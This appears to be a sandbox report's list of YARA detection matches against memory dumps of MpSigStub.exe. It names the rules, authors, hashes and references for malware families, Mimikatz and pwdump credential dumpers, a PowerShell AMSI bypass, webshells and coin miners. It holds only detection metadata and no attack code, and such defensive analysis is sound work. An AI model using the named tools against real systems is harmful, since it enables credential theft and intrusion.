Source: 36.3.MpSigStub.exe.197a3f032fe.94.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3f032fe.94.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359a55a.157.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3515a01.88.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4df1a99.144.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunnignRAT date = 2018-02-03, hash3 = 98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a, hash2 = 5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b, hash1 = 94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579, author = Florian Roth, description = Detects Running RAT malware from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: pdb_strings_Rescator date = 01/30/2014, author = @patrickrolsen, maltype = Target Attack, description = Rescator PDB strings within binaries, version = 0.3
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
